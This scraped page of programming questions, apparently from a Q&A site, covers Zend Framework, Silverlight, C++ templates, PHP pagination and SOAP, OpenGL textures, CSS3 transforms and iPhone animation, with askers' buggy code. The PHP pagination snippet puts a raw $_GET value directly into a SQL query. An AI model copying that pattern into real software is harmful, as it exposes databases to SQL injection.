sender._selectedDate.format(sender._format); } } </script> Error Screen(Hmmm :X) Now in ToDate, when you select Date Earlier than today or Date less than FromDate, ToDate Calendar shows NaN for Every Date and ,0NaN for Year

  • Building a modular Website with Zend Framework: Am I on the right way?

    - by Oliver
    Hi, i´m a little bit confused by reading all this posts an tutorials about staring with Zend, because there a so many different ways to solve a problem. I only need a feedback about my code to know if iam on the right way: To simply get a (hard coded) Navigation for my side (depending on who is logged in) i build a Controller Plugin with a postDispatch method that holds following code: public function postDispatch(Zend_Controller_Request_Abstract $request) { $menu = new Menu(); //Render menu in menu.phtml $view = new Zend_View(); //NEW view -> add View Helper $prefix = 'My_View_Helper'; $dir = dirname(__FILE__).'/../../View/Helper/'; $view->addHelperPath($dir,$prefix); $view->setScriptPath('../application/default/views/scripts/menu'); $view->menu = $menu->getMenu(); $this->getResponse()->insert('menu', $view->render('menu.phtml')); } Is it right that i need to set the helper path once again? I did this in a Plugin Controller named ViewSetup. There i do some setup for the view like doctype, headlinks, helper paths...(This step is from the book: Zend Framework in Action) The Menu class which is initiated looks like this: class Menu { protected $_menu = array(); /** * Menu for notloggedin and logged in */ public function getMenu() { $auth = Zend_Auth::getInstance(); $view = new Zend_View(); //check if user is logged in if(!$auth->hasIdentity()) { $this->_menu = array( 'page1' => array( 'label' => 'page1', 'title' => 'page1', 'url' => $view->url(array('module' => 'pages','controller' => 'my', 'action' => 'page1')) ), 'page2' => array( 'label' => 'page2', 'title' => 'page2', 'url' => $view->url(array('module' => 'pages','controller' => 'my', 'action' => 'page2')) ), 'page3' => array( 'label' => 'page3', 'title' => 'page3', 'url' => $view->url(array('module' => 'pages','controller' => 'my', 'action' => 'page3')) ), 'page4' => array( 'label' => 'page4', 'title' => 'page4', 'url' => $view->url(array('module' => 'pages','controller' => 'my', 'action' => 'page4')) ), 'page5' => array( 'label' => 'page5', 'title' => 'page5', 'url' => $view->url(array('module' => 'pages','controller' => 'my', 'action' => 'page5')) ) ); } else { //user is vom type 'client' //.. } return $this->_menu; } } Here´s my view script: <ul id="mainmenu"> <?php echo $this->partialLoop('menuItem.phtml',$this->menu) ?> </ul> This is working so far. My question is: is it usual to do it this way, is there anything to improve? I´m new to Zend and in the web are many deprecated tutorials which often is not obvious. Even the book is already deprecated where the autoloader is mentioned. Many thanks in advance

  • Silverlight: Binding a custom control to an arbitrary object

    - by Ryan Bates
    I am planning on writing a hierarchical organizational control, similar to an org chart. Several org chart implementations are out there, but not quite fit what I have in mind. Binding fields in a DataTemplate to a custom object does not seem to work. I started with a generic, custom control, i.e. public class NodeBodyBlock : ContentControl { public NodeBodyBlock() { this.DefaultStyleKey = typeof(NodeBodyBlock); } } It has a simple style in generic.xaml: <Style TargetType="org:NodeBodyBlock"> <Setter Property="Width" Value="200" /> <Setter Property="Height" Value="100" /> <Setter Property="Background" Value="Lavender" /> <Setter Property="FontSize" Value="11" /> <Setter Property="Template"> <Setter.Value> <ControlTemplate TargetType="org:NodeBodyBlock"> <Border Width="{TemplateBinding Width}" Height="{TemplateBinding Height}" Background="{TemplateBinding Background}" CornerRadius="4" BorderBrush="Black" BorderThickness="1" > <Grid> <VisualStateManager/> ... clipped for brevity </VisualStateManager.VisualStateGroups> <ContentPresenter Content="{TemplateBinding Content}" HorizontalAlignment="Stretch" VerticalAlignment="Stretch" /> </Grid> </Border> </ControlTemplate> </Setter.Value> </Setter> </Style> My plan now is to be able to use this common definition as a base definition of sorts, with customized version of it used to display different types of content. A simple example would be to use this on a user control with the following style: <Style TargetType="org:NodeBodyBlock" x:Key="TOCNode2"> <Setter Property="ContentTemplate"> <Setter.Value> <DataTemplate> <StackPanel> <TextBlock Text="{Binding Path=NodeTitle}"/> </StackPanel> </DataTemplate> </Setter.Value> </Setter> </Style> and an instance defined as <org:NodeBodyBlock Style="{StaticResource TOCNode2}" x:Name="stTest" DataContext="{StaticResource DummyData}" /> The DummyData is defined as <toc:Node NodeNumber="mynum" NodeStatus="A" NodeTitle="INLine Node Title!" x:Key="DummyData"/> With a simple C# class behind it, where each of the fields is a public property. When running the app, the Dummy Data values simply do not show up in the GUI. A trivial test such as <TextBlock Text="{Binding NodeTitle}" DataContext="{StaticResource DummyData}"/> works just fine. Any ideas around where I am missing the plot?

  • How to get the selected index of a dropdowlist with javascript

  • Fill container with template parameters

    - by phlipsy
    I want to fill the template parameters passed to a variadic template into an array with fixed length. For that purpose I wrote the following helper function templates template<typename ForwardIterator, typename T> void fill(ForwardIterator i) { } template<typename ForwardIterator, typename T, T head, T... tail> void fill(ForwardIterator i) { *i = head; fill<ForwardIterator, T, tail...>(++i); } the following class template template<typename T, T... args> struct params_to_array; template<typename T, T last> struct params_to_array<T, last> { static const std::size_t SIZE = 1; typedef std::array<T, SIZE> array_type; static const array_type params; private: void init_params() { array_type result; fill<typename array_type::iterator, T, head, tail...>(result.begin()); return result; } }; template<typename T, T head, T... tail> struct params_to_array<T, head, tail...> { static const std::size_t SIZE = params_to_array<T, tail...>::SIZE + 1; typedef std::array<T, SIZE> array_type; static const array_type params; private: void init_params() { array_type result; fill<typename array_type::iterator, T, last>(result.begin()); return result; } }; and initialized the static constants via template<typename T, T last> const typename param_to_array<T, last>::array_type param_to_array<T, last>::params = param_to_array<T, last>::init_params(); and template<typename T, T head, T... tail> const typename param_to_array<T, head, tail...>::array_type param_to_array<T, head, tail...>::params = param_to_array<T, head, tail...>::init_params(); Now the array param_to_array<int, 1, 3, 4>::params is a std::array<int, 3> and contains the values 1, 3 and 4. I think there must be a simpler way to achieve this behavior. Any suggestions? Edit: As Noah Roberts suggested in his answer I modified my program like the following: I wrote a new struct counting the elements in a parameter list: template<typename T, T... args> struct count; template<typename T, T head, T... tail> struct count<T, head, tail...> { static const std::size_t value = count<T, tail...>::value + 1; }; template<typename T, T last> stuct count<T, last> { static const std::size_t value = 1; }; and wrote the following function template<typename T, T... args> std::array<T, count<T, args...>::value> params_to_array() { std::array<T, count<T, args...>::value> result; fill<typename std::array<T, count<T, args...>::value>::iterator, T, args...>(result.begin()); return result; } Now I get with params_to_array<int, 10, 20, 30>() a std::array<int, 3> with the content 10, 20 and 30. Any further suggestions?

  • Converting PHP pagination to jQuery?

    - by ClarkSKent
    Hey, I have been trying to get this pagination class that I am using to be more ajaxy - meaning when I click on the page number like page [2] the data loads, but I want to load in the data without going to a different page (HTTP request in the background, with no page reloads). Being new to both php and jquery, I am a little unsure on how to achieve this result, especially while using a php class. This is what the main page looks like by the way: <?php $categoryId=$_GET['category']; echo $categoryId; ?> <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.1/jquery.min.js"></script> <script type="text/javascript" src="jquery_page.js"></script> <?php //Include the PS_Pagination class include('ps_pagination.php'); //Connect to mysql db $conn = mysql_connect('localhost', 'root', 'root'); mysql_select_db('ajax_demo',$conn); $sql = "select * from explore where category='$categoryId'"; //Create a PS_Pagination object $pager = new PS_Pagination($conn, $sql, 3, 11, 'param1=value1&param2=value2'); //The paginate() function returns a mysql //result set for the current page $rs = $pager->paginate(); //Loop through the result set echo "<table width='800px'>"; while($row = mysql_fetch_assoc($rs)) { echo "<tr>"; echo"<td>"; echo $row['id']; echo"</td>"; echo"<td>"; echo $row['site_description']; echo"</td>"; echo"<td>"; echo $row['site_price']; echo"</td>"; echo "</tr>"; } echo "</table>"; echo "<ul id='pagination'>"; echo "<li>"; //Display the navigation echo $pager->renderFullNav(); echo "</li>"; echo "</ul>"; ?> <div id="loading" ></div> <div id="content" ></div> Would I need to do something with this part of the class?, as seen above: $pager = new PS_Pagination($conn, $sql, 3, 11, 'param1=value1&param2=value2'); Or this?: echo $pager->renderFullNav(); I don't no much about jquery,but i guess I would start it like: $("#pagination li").click(function() { Then load something maybe... I don't no. Any help on this would be great. Thanks.

  • php soapclient returns null but getPreviousResults has proper results

    - by Joseph.Chambers
    I've ran into trouble with SOAP, I've never had this issue before and can't find any information on line that helps me solve it. The following code $wsdl = "path/to/my/wsdl"; $client = new SoapClient($wsdl, array('trace' => true)); //$$textinput is passed in and is a very large string with rows in <item></item> tags $soapInput = new SoapVar($textinput, XSD_ANYXML); $res = $client->dataprofilingservice(array("contents" => $soapInput)); $response = $client->__getLastResponse(); var_dump($res);//outputs null var_dump($response);//provides the proper response as I would expect. I've tried passing params into the SoapClient constructor to define soap version but that didnt' help. I've also tried it with the trace param set to false and not present which as expected made $response null but $res was still null. I've tried the code on both a linux and windows install running Apache. The function definition in the WSDL is (xxxx is for security reasons) <portType name="xxxxServiceSoap"> <operation name="dataprofilingservice"> <input message="tns:dataprofilingserviceSoapIn"/> <output message="tns:dataprofilingserviceSoapOut"/> </operation> </portType> I have it working using the __getLastResponse() but its annoying me it will not work properly. I've put together a small testing script, does anyone see any issues here. //very simplifed dataset that would normally be //read in from a CSV file of about 1mb $soapInput = getSoapInput("asdf,qwer\r\nzzxvc,ewrwe\r\n23424,2113"); $wsdl = "path to wsdl"; try { $client = new SoapClient($wsdl,array('trace' => true,'exceptions' => true)); } catch (SoapFault $fault) { $error = 1; var_dump($fault); } try { $res = $client->dataprofilingservice(array("contents" => $soapInput)); $response = $client->__getLastResponse(); echo htmlentities($client->__getLastRequest()); echo '<hr>'; var_dump($res); echo "<hr>"; echo(htmlentities($response)); } catch (SoapFault $fault) { $error = 1; var_dump($fault); } function getSoapInput($input){ $rows = array(); $userInputs = explode("\r\n", $input); $userInputs = array_filter($userInputs); // $inputTemplate = " <contents>%s</contents>"; $rowTemplate = "<Item>%s</Item>"; // $soapString = ""; foreach ($userInputs as $row) { // sanitize $row = htmlspecialchars(addslashes($row)); $xmlStr = sprintf($rowTemplate, $row); $rows[] = $xmlStr; } $textinput = sprintf($inputTemplate, implode(PHP_EOL, $rows)); $soapInput = new SoapVar($textinput, XSD_ANYXML); return $soapInput; }

  • OpenGL texture misaligned on quad

    - by user308226
    I've been having trouble with this for a while now, and I haven't gotten any solutions that work yet. Here is the problem, and the specifics: I am loading a 256x256 uncompressed TGA into a simple OpenGL program that draws a quad on the screen, but when it shows up, it is shifted about two pixels to the left, with the cropped part appearing on the right side. It has been baffling me for the longest time, people have suggested clamping and such, but somehow I think my problem is probably something really simple, but I just can't figure out what it is! Here is a screenshot comparing the TGA (left) and how it appears running in the program (right) for clarity. Also take note that there's a tiny black pixel on the upper right corner, I'm hoping that's related to the same problem. Here's the code for the loader, I'm convinced that my problem lies in the way that I'm loading the texture. Thanks in advance to anyone who can fix my problem. bool TGA::LoadUncompressedTGA(char *filename,ifstream &texturestream) { cout << "G position status:" << texturestream.tellg() << endl; texturestream.read((char*)header, sizeof(header)); //read 6 bytes into the file to get the tga header width = (GLuint)header[1] * 256 + (GLuint)header[0]; //read and calculate width and save height = (GLuint)header[3] * 256 + (GLuint)header[2]; //read and calculate height and save bpp = (GLuint)header[4]; //read bpp and save cout << bpp << endl; if((width <= 0) || (height <= 0) || ((bpp != 24) && (bpp !=32))) //check to make sure the height, width, and bpp are valid { return false; } if(bpp == 24) { type = GL_RGB; } else { type = GL_RGBA; } imagesize = ((bpp/8) * width * height); //determine size in bytes of the image cout << imagesize << endl; imagedata = new GLubyte[imagesize]; //allocate memory for our imagedata variable texturestream.read((char*)imagedata,imagesize); //read according the the size of the image and save into imagedata for(GLuint cswap = 0; cswap < (GLuint)imagesize; cswap += (bpp/8)) //loop through and reverse the tga's BGR format to RGB { imagedata[cswap] ^= imagedata[cswap+2] ^= //1st Byte XOR 3rd Byte XOR 1st Byte XOR 3rd Byte imagedata[cswap] ^= imagedata[cswap+2]; } texturestream.close(); //close ifstream because we're done with it cout << "image loaded" << endl; glGenTextures(1, &texID); // Generate OpenGL texture IDs glBindTexture(GL_TEXTURE_2D, texID); glPixelStorei(GL_UNPACK_ALIGNMENT, 1); glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_WRAP_S, GL_REPEAT); glTexParameteri (GL_TEXTURE_2D, GL_TEXTURE_WRAP_T, GL_REPEAT); glTexParameteri (GL_TEXTURE_2D, GL_TEXTURE_MAG_FILTER, GL_NEAREST); glTexParameteri (GL_TEXTURE_2D, GL_TEXTURE_MIN_FILTER, GL_NEAREST); glTexEnvf(GL_TEXTURE_ENV, GL_TEXTURE_ENV_MODE, GL_MODULATE); glTexImage2D(GL_TEXTURE_2D, 0, type, width, height, 0, type, GL_UNSIGNED_BYTE, imagedata); delete imagedata; return true; } //Public loading function for TGA images. Opens TGA file and determines //its type, if any, then loads it and calls the appropriate function. //Returns: TRUE on success, FALSE on failure bool TGA::loadTGA(char *filename) { cout << width << endl; ifstream texturestream; texturestream.open(filename,ios::binary); texturestream.read((char*)header,sizeof(header)); //read 6 bytes into the file, its the header. //if it matches the uncompressed header's first 6 bytes, load it as uncompressed LoadUncompressedTGA(filename,texturestream); return true; }

  • Drawing using Dynamic Array and Buffer Object

    - by user1905910
    I have a problem when creating the vertex array and the indices array. I don't know what really is the problem with the code, but I guess is something with the type of the arrays, can someone please give me a light on this? #define GL_GLEXT_PROTOTYPES #include<GL/glut.h> #include<iostream> using namespace std; #define BUFFER_OFFSET(offset) ((GLfloat*) NULL + offset) const GLuint numDiv = 2; const GLuint numVerts = 9; GLuint VAO; void display(void) { enum vertex {VERTICES, INDICES, NUM_BUFFERS}; GLuint * buffers = new GLuint[NUM_BUFFERS]; GLfloat (*squareVerts)[2] = new GLfloat[numVerts][2]; GLubyte * indices = new GLubyte[numDiv*numDiv*4]; GLuint delta = 80/numDiv; for(GLuint i = 0; i < numVerts; i++) { squareVerts[i][1] = (i/(numDiv+1))*delta; squareVerts[i][0] = (i%(numDiv+1))*delta; } for(GLuint i=0; i < numDiv; i++){ for(GLuint j=0; j < numDiv; j++){ //cada iteracao gera 4 pontos #define NUM_VERT(ii,jj) ((ii)*(numDiv+1)+(jj)) #define INDICE(ii,jj) (4*((ii)*numDiv+(jj))) indices[INDICE(i,j)] = NUM_VERT(i,j); indices[INDICE(i,j)+1] = NUM_VERT(i,j+1); indices[INDICE(i,j)+2] = NUM_VERT(i+1,j+1); indices[INDICE(i,j)+3] = NUM_VERT(i+1,j); } } glGenVertexArrays(1, &VAO); glBindVertexArray(VAO); glGenBuffers(NUM_BUFFERS, buffers); glBindBuffer(GL_ARRAY_BUFFER, buffers[VERTICES]); glBufferData(GL_ARRAY_BUFFER, sizeof(squareVerts), squareVerts, GL_STATIC_DRAW); glVertexPointer(2, GL_FLOAT, 0, BUFFER_OFFSET(0)); glEnableClientState(GL_VERTEX_ARRAY); glBindBuffer(GL_ELEMENT_ARRAY_BUFFER, buffers[INDICES]); glBufferData(GL_ELEMENT_ARRAY_BUFFER, sizeof(indices), indices, GL_STATIC_DRAW); glClear(GL_COLOR_BUFFER_BIT); glColor3f(1.0,1.0,1.0); glDrawElements(GL_POINTS, 16, GL_UNSIGNED_BYTE, BUFFER_OFFSET(0)); glutSwapBuffers(); } void init() { glClearColor(0.0, 0.0, 0.0, 0.0); gluOrtho2D((GLdouble) -1.0, (GLdouble) 90.0, (GLdouble) -1.0, (GLdouble) 90.0); } int main(int argv, char** argc) { glutInit(&argv, argc); glutInitDisplayMode(GLUT_RGB | GLUT_DOUBLE); glutInitWindowSize(500,500); glutInitWindowPosition(100,100); glutCreateWindow("myCode.cpp"); init(); glutDisplayFunc(display); glutMainLoop(); return 0; } Edit: The problem here is that drawing don't work at all. But I don't get any error, this just don't display what I want to display. Even if I put the code that make the vertices and put them in the buffers in a diferent function, this don't work. I just tried to do this: void display(void) { glBindVertexArray(VAO); glClear(GL_COLOR_BUFFER_BIT); glColor3f(1.0,1.0,1.0); glDrawElements(GL_POINTS, 16, GL_UNSIGNED_BYTE, BUFFER_OFFSET(0)); glutSwapBuffers(); } and I placed the rest of the code in display in another function that is called on the start of the program. But the problem still

  • Sidebar with CSS3 transform

    - by Malcoda
    Goal I'm working on a collapsible sidebar using jQuery for animation. I would like to have vertical text on the sidebar that acts as a label and can swap on the animateOut/animateIn effect. Normally I would use an image of the text that I've simply swapped vertically, and switch it out on animation, but with CSS3 transforms I'd like to get it to work instead. Problem The problem I'm facing is that setting the height on my rotated container makes it expand horizontally (as it's rotated 90deg) so that doesn't work. I then tried to set the width (hoping it would expand vertically, acting as height), but that has an odd effect of causing the width of my parent container to expand as well. Fix? Anyone know why this happens and also what the fix/workaround could be without setting max-widths and overflow: hidden? I've got a fairly good understanding of both html elements behavior and css3, but this is stumping me. Live Example Here's a fiddle that demonstrates my problem: Fiddle The collapse-pane class is what I have rotated and contains the span I have my text inside. You'll notice it has a width set, that widens the border, but also affects the parent container. The code: CSS: .right-panel{ position:fixed; right:0; top:0; bottom:0; border:1px solid #ccc; background-color:#efefef; } .collapse-pane{ margin-top:50px; width:30px; border:1px solid #999; cursor:pointer; /* Safari */ -webkit-transform: rotate(-90deg); /* Firefox */ -moz-transform: rotate(-90deg); /* IE */ -ms-transform: rotate(-90deg); /* Opera */ -o-transform: rotate(-90deg); /* Internet Explorer */ filter: progid:DXImageTransform.Microsoft.BasicImage(rotation=3); } .collapse-pane span{ padding:5px; } HTML <div class="right-panel"> <div class="collapse-pane"> <span class="expand">Expand</span> </div> <div style="width:0;" class="panel-body"> <div style="display:none;" class="panel-body-inner"> adsfasdfasdf </div> </div> </div> JavaScript (Thought not really relevant) $(document).ready(function(){ var height = $(".right-panel").height(); $(".collapse-pane").css({marginTop: height/2 - 20}); $('.collapse-pane').click(function(){ if($(".collapse-pane span").html() == "Expand"){ $(".panel-body").animate({width:200}, 400); $(".panel-body-inner").fadeIn(500); $(".collapse-pane span").html("Collapse"); }else{ $(".panel-body").animate({width:00}, 400); $(".panel-body-inner").fadeOut(300); $(".collapse-pane span").html("Expand"); } }); }); I hope this was clear... Thanks for any help!

  • Possible iphone animation timing/rendering bug?

    - by David
    Hi all, I have been working on an iphone apps for several weeks. Now I encounter an animation problem that I can't figure out how to resolve. Mayhbe you can help. Here is the details (a little long, bear with me): Basically the effect I want to achieve is, when user click a button, a loading view pops up, hiding the whole screen; and then the apps does a lot of heavy computation, which takes a few seconds. Once the computation is done, soem result views (something likes checkers on a checker board) are rendered under the loading view. Once all result views are rendered, I used animation animation to remove the loading view nand show the result views to the user. Here is what I do: when user click a button, run this code: [UIView beginAnimations:nil context:nil]; [UIView setAnimationDuration:1.0]; [UIView setAnimationBeginsFromCurrentState:YES]; [UIView setAnimationTransition:UIViewAnimationTransitionCurlDown forView:self.view cache:YES]; [UIView setAnimationDelegate:self]; [UIView setAnimationDidStopSelector:@selector(loadingViewInserted:finished:context:)]; // use a really high index number so it will always on top [self.view insertSubview:loadingViewController.view atIndex:1000]; [UIView commitAnimations]; In the "loadingViewInserted" function, it calls another function doing the heavy computation work. Once the computation is done, a lot of result views (like checkers on a checker board) are rendered under the loading view. for(int colIndex = 1; colIndex <= result.columns; colIndex++) { for(int rowIndex = 1; rowIndex <= result.rows; rowIndex++) { ResultView *rv = [ResultView resultViewWithData:results[colIndex][rowIndex]]; [self.view addSubview:rv]; } } Once all result views are added, following animation is invoked to remove the loading view: [UIView beginAnimations:nil context:nil]; [UIView setAnimationDuration:1.0]; [UIView setAnimationBeginsFromCurrentState:YES]; [UIView setAnimationTransition:UIViewAnimationTransitionCurlUp forView:self.view cache:YES]; [loadingViewController.view removeFromSuperview]; [UIView commitAnimations]; By doing this, most of the time (maybe 90%) it does exactly what I want. However, sometime I see some weird result: the loading view shows up first as expected, then before it disappears, some result views, which suppose to be under the loading view, suddenly appears on top of the loading view; and some of them are partial rendered. And then the loading view curled up, and everything looks normal again. The weird situation only lasts for less than a second, but already bad enough to screw up the UI. I have tried all different kinds of thing to fix this (using another thread to remove the loading view, make the loading view non-transparent), but none of them works. The only thing that makes a little better is, I hide all the result views first; after the last animation finished, in its call back, unhide all result views. But this loses the nice effect that when curling up the loading view, the results are already there. At this point, I really think this is a bug in iphone (I compile it with OS 3.0) OS. Or maybe you can point out what I have done wrong (or could do differently). (thanks for finishing this long post, :-) )
